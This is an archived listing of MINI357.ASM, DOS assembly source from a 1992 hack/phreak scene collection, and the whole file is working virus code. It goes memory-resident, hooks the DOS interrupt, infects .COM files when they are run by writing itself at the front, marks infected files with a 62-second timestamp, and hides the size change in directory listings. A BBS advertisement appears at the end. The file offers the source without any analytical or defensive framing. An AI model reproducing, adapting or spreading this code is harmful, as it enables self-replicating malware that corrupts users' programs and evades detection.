home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / SOURCE.ZIP / MINI357.ASM < prev    next >
Assembly Source File  |  1992-11-29  |  6KB  |  188 lines
  1. ;
  2. ;
  3. ;
  4.                 org     100h
  5.  
  6. ofs:
  7.                 push    100h
  8.                 push    ax
  9.                 push    ds
  10.                 push    es
  11.                 mov     dx,054h-(ofs/16)
  12.                 mov     es,dx
  13.                 mov     ax,es:ofs[0]
  14.                 cmp     ax,ofs[0]
  15.                 je      to_host
  16.  
  17.                 lea     si,ofs
  18.                 mov     di,si
  19.                 mov     cx,virlength
  20.                 rep     movsb
  21.  
  22.                 mov     ds,es
  23.                 mov     ax,3521h
  24.                 int     21h
  25.                 mov     word ptr ds:old21[0],bx
  26.                 mov     word ptr ds:old21[2],es
  27.  
  28.                 mov     ax,2521h
  29.                 lea     dx,new21
  30.                 int     21h
  31.  
  32. to_host:        pop     es
  33.                 pop     ds
  34.                 mov     di,0fe00h
  35.                 lea     si,relocator
  36.                 mov     cx,rellength
  37.                 rep     movsb
  38.                 jmp     0fe00h
  39.  
  40. old21           dd 0
  41.  
  42. relocator:
  43.                 mov     di,100h
  44. orgofs:         lea     si,orgp
  45.                 mov     cx,virlength
  46.                 rep     movsb
  47.                 pop     ax
  48.                 ret
  49.  
  50. rellength       equ     $-relocator
  51.  
  52. new21:
  53.                 cmp     ah,11h
  54.                 je      findfcb
  55.                 cmp     ah,12h
  56.                 je      findfcb
  57.                 cmp     ah,4eh
  58.                 je      find
  59.                 cmp     ah,4fh
  60.                 je      find
  61.                 cmp     ax,4b00h
  62.                 je      exec
  63.  
  64.                 jmp     short dword ptr cs:[old21]
  65.  
  66. getdta:
  67.                 pop si
  68.                 pushf
  69.                 push ax
  70.                 push bx
  71.                 push es
  72.                 mov  ah,2fh
  73.                 call dos
  74.                 jmp short si
  75.  
  76. FindFCB:        call    DOS                             ; call orginal interrupt
  77.                 cmp     al,0                            ; error ?
  78.                 jne     Ret1
  79.                 call    getdta
  80.                 cmp     byte ptr es:[bx],-1             ; extended fcb ?
  81.                 jne     FCBOk
  82.                 add     bx,8                            ; yes, skip 8 bytes
  83. FCBOk:          mov     al,es:[bx+16h]                  ; get file-time (low byte)
  84.                 and     al,1fh                          ; seconds
  85.                 cmp     al,1fh                          ; 62 seconds ?
  86.                 jne     FileOk                          ; no, file not infected
  87.                 sub     word ptr es:[bx+1ch],Virlength  ; adjust file-size
  88.                 sbb     word ptr es:[bx+1eh],0
  89.                 jmp     short Time
  90.  
  91. Find:           call    DOS
  92.                 jc      Ret1
  93.                 call    getdta
  94.                 mov     al,es:[bx+16h]
  95.                 and     al,1fh
  96.                 cmp     al,1fh
  97.                 jne     FileOk
  98.                 sub     word ptr es:[bx+1ah],VirLength
  99.                 sbb     word ptr es:[bx+1ch],0
  100. Time:           xor     byte ptr es:[bx+16h],10h
  101. FileOk:         pop     es
  102.                 pop     bx
  103.                 pop     ax
  104.                 popf
  105. Ret1:           retf    2
  106.  
  107. exec:           push    ax
  108.                 push    bx
  109.                 push    cx
  110.                 push    dx
  111.                 push    ds
  112.                 push    es
  113.                 mov     ax,3d02h
  114.                 call    dos
  115.                 mov     bx,0bc00h
  116.                 mov     ds,bx
  117.                 mov     bh,3fh
  118.                 xchg    ax,bx
  119.                 xor     dx,dx
  120.                 mov     cx,virlength
  121.                 call    dos
  122.                 cmp     word ptr ds:[0],'ZM'
  123.                 je      exe
  124.                 cmp     word ptr ds:[0],0068h   ; push 100
  125.                 jne     noexe
  126. exe:            mov     ah,3eh
  127.                 call    dos
  128.                 pop     es
  129.                 pop     ds
  130.                 pop     dx
  131.                 pop     cx
  132.                 pop     bx
  133.                 pop     ax
  134.                 jmp     short dword ptr cs:[old21]
  135.  
  136. noexe:          mov     ax,4202h
  137.                 xor     cx,cx
  138.                 xor     dx,dx
  139.                 call    dos
  140.                 cmp     ax,0fd00h
  141.                 jae     exe
  142.                 cmp     ax,virlength+10
  143.                 jb      exe
  144.                 inc     ah
  145.                 mov     word ptr cs:orgofs[1],ax
  146.  
  147.                 mov     ax,5700h
  148.                 call    dos
  149.                 or      cx,1fh
  150.                 push    cx
  151.                 push    dx
  152.  
  153.                 mov     ah,40h
  154.                 xor     dx,dx
  155.                 mov     cx,virlength
  156.                 push    cx
  157.                 call    dos
  158.  
  159.                 mov     ax,4200h
  160.                 xor     cx,cx
  161.                 xor     dx,dx
  162.                 call    dos
  163.  
  164.                 mov     ah,40h
  165.                 mov     ds,cs
  166.                 lea     dx,ofs
  167.                 pop     cx
  168.                 call    dos
  169.                 mov     ax,5701h
  170.                 pop     dx
  171.                 pop     cx
  172.                 call    dos
  173.  
  174.                 jmp     short exe
  175.  
  176. dos:            pushf
  177.                 call    dword ptr cs:[old21]
  178.                 ret
  179.  
  180. virlength        equ     $-ofs
  181.  
  182. orgp:            int     20h
  183.  
  184. ;  ─────────────────────────────────────────────────────────────────────────
  185. ;  ────────────────────> and Remember Don't Forget to Call <────────────────
  186. ;  ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
  187. ;  ─────────────────────────────────────────────────────────────────────────
  188.